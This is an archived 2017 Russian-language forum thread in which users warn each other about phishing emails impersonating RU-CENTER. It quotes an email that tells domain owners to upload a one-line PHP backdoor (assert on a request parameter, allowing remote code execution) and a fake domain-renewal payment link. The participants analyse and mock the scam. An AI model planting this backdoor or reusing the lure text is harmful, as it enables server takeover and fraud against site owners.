Мошеннические письма от имени ru center

Discussion:

(слишком старое сообщение для ответа)

Sergey Poziturin

2017-08-06 05:55:16 UTC

Hello, All.

Аккуратно, сабж :)

Руки чесались сделать honeypot и изучить, как у них чего устроено, но беглый
гуглеж показал, что добрые люди все давно сделали за меня, а письма такие
приходят и от других "организаций".

==
Уважаемый клиент!

В соответствии с изменениями, внесенными в правила ICANN, Вы должны
подтвердить, что фактическое управление доменным именем propush.ru
осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в
корневой директории сайта файл a1p0q966ham6br04.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения данного
уведомления и находиться на сервере до 16 августа 2017 года, 19:00 (UTC+03:00),
в противном случае процедура подтверждения будет считаться непройденной.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена,
делегирование домена будет приостановлено.
==

--
Best regards!
Posted using Hotdoged on Android

Evgeny Mikheev

2017-08-06 09:24:18 UTC

Permalink

Привет, Sergey!

06 авг 17 08:55, Sergey Poziturin -> All:

SP> <?php
SP> assert(stripslashes($_REQUEST[RUCENTER]));
SP> ?>

В php не силен, что злоумышленнику позволяет выполнить этот код?

С наилучшими пожеланиями, Evgeny.

Sergey Poziturin

2017-08-07 05:41:10 UTC

Permalink

Hello, Evgeny Mikheev.
On 06.08.17 12:24 ПП you wrote:

SP>> <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
EM> В php не силен, что злоумышленнику позволяет выполнить этот код?

http://php.net/manual/ru/function.assert.php

Фактически это выполнение на сервере кода, переданного в запросе. Гораздо
интереснее, какой конкретно код они попытаются выполнить.

--
Best regards!
Posted using Hotdoged on Android

Egor Glukhov

2017-08-07 06:43:34 UTC

Permalink

Sergey,

07 Aug 17 08:41, you wrote to Evgeny Mikheev:

SP>>> <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
EM>> В php не силен, что злоумышленнику позволяет выполнить этот код?

SP> http://php.net/manual/ru/function.assert.php

SP> Фактически это выполнение на сервере кода, переданного в запросе. Гораздо
SP> интереснее, какой конкретно код они попытаются выполнить.

Как правило, создающий рядом файл с php-шеллом.

Егор Глухов

Alexandr Shliakhov

2017-08-07 07:11:10 UTC

Permalink

Привет, Evgeny!

Ответ на сообщение Evgeny Mikheev (2:5030/1474) к Sergey Poziturin,
написанное 06 авг 17 в 12:24:

SP>> <?php
SP>> assert(stripslashes($_REQUEST[RUCENTER]));
SP>> ?>

EM> В php не силен, что злоумышленнику позволяет выполнить этот код?

Тоже в php не силён, но замечу, что злоумышленники не написали, что надо файлу
дать право на исполнение.

Best regards, Alexandr
<***@list.ru> <***@everfree.equ> <2:5023/***@fidonet>
... ***@shining:~$ sudo mkfs.soulfs /dev/nvram

Alexey Vissarionov

2017-08-07 07:44:44 UTC

Permalink

Доброго времени суток, Alexandr!
07 Aug 2017 10:11:10, ты -> Evgeny Mikheev:

SP>>> <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
EM>> В php не силен, что злоумышленнику позволяет выполнить этот код?
AS> Тоже в php не силён, но замечу, что злоумышленники не написали,
AS> что надо файлу дать право на исполнение.

Дык оно ж рассчитано на ламеров, которые его себе таки положат - а у них
говносайтики в 99.99% случаев используют либо апачевский mod_php, либо, в
особенно пафосных случаях, php-fpm :-)

А кто поумнее - те и вышеупомянутыми интерпретаторами не пользуются, и файлы
создавать не будут.

2 all: надеюсь, все знают, как затыкать подобные бэкдоры средствами nginx?

--
Alexey V. Vissarionov aka Gremlin from Kremlin
gremlin ПРИ gremlin ТЧК ru; +vii-cmiii-ccxxix-lxxix-xlii

... Опыты над мышами подтверждают, что встреча с черной кошкой - плохая примета

Anatoliy Sablin

2017-08-07 09:56:12 UTC

Permalink

Hello,

Hello, Alexey Vissarionov.
On 07.08.17 10:44 you wrote:

AV> 2 all: надеюсь, все знают, как затыкать подобные бэкдоры
AV> средствами nginx?

Отключить php? ;)

--
Best regards!
Posted using Hotdoged on Android

Eugene Sharov

2017-08-11 22:07:44 UTC

Permalink

Привет, Alexey!

07 авг 17 10:44, Alexey Vissarionov -> Alexandr Shliakhov:

SP>>>> <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
AV> 2 all: надеюсь, все знают, как затыкать подобные бэкдоры средствами
AV> nginx?
Считай меня дебилом и новисом, но таки расскажи подробнее.

С наилучшими пожеланиями, Eugene.

*В эфире:* ЧайФ - Время не ждет
... Я знал, что молчание - золото, но я предпочёл серебро (Ю.Наумов)

Alex Kovrigin

2017-08-06 13:14:34 UTC

Permalink

Hello Sergey,
In a message dated 06 Aug 17 you wrote to All:

SP> Аккуратно, сабж :)

Ага, я пеpвым делом заглянул в Received, там такая туфта:

Received: from data01ua.trust-host.ru ([62.149.15.150]:44682)
by mx206.i.mail.ru with esmtp (envelope-from
<***@data01ua.trust-host.ru>)
id 1d41IE-00023O-3s
for creator-***@mail.ru; Fri, 28 Apr 2017 11:30:22 +0300
Received: from sayma100 by data01ua.trust-host.ru with local (Exim 4.88)
(envelope-from <***@data01ua.trust-host.ru>)
id 1d41IA-003kkk-OG
for creator-***@mail.ru; Fri, 28 Apr 2017 11:30:18 +0300

Такие смешные.

WBR, Alex Kovrigin <alex(at)kovrigin.ru>

Eugene Muzychenko

2017-08-06 14:45:36 UTC

Permalink

Привет!

06 Aug 17 16:14, you wrote to Sergey Poziturin:

AK> Такие смешные.

Смешные - не смешные, а свои 10-20% недоадминов (которые по инструкциям из сети
сумели поднять сервер, отчего вообразили себя админами) поимеют. :)

Всего доброго!
Евгений Музыченко
eu-***@muzy-chen-ko.net (все дефисы убрать)

Alex Kovrigin

2017-08-11 10:36:19 UTC

Permalink

Hello Eugene,
In a message dated 06 Aug 17 you wrote to me:

EM> Смешные - не смешные, а свои 10-20% недоадминов (которые по инструкциям
EM> из сети сумели поднять сервер, отчего вообразили себя админами)
EM> поимеют. :)

Это да. А вчеpа вечеpом мне пpислали вот такое:
===
Уважаемый администратор домена!

Уведомляем Вас о том, что период регистрации домена kovrigin.ru подошел к
концу.

Вам необходимо оплатить услугу продления домена в течение суток с момента
получения настоящего сообщения.
===
И кнопочка "Оплатить":
http://dfib.ru/wp-includes/SimplePie/Content/idn/payment.php?id=блаблабла
===
Доводим до Вашего сведения, что если платеж не будет произведен в указанный
срок, обслуживание доменного имени прекратится. Домен будет удален из реестра
доменных имен и станет доступен для регистрации иным лицам.
===

Такие заботливые! :)

WBR, Alex Kovrigin <alex(at)kovrigin.ru>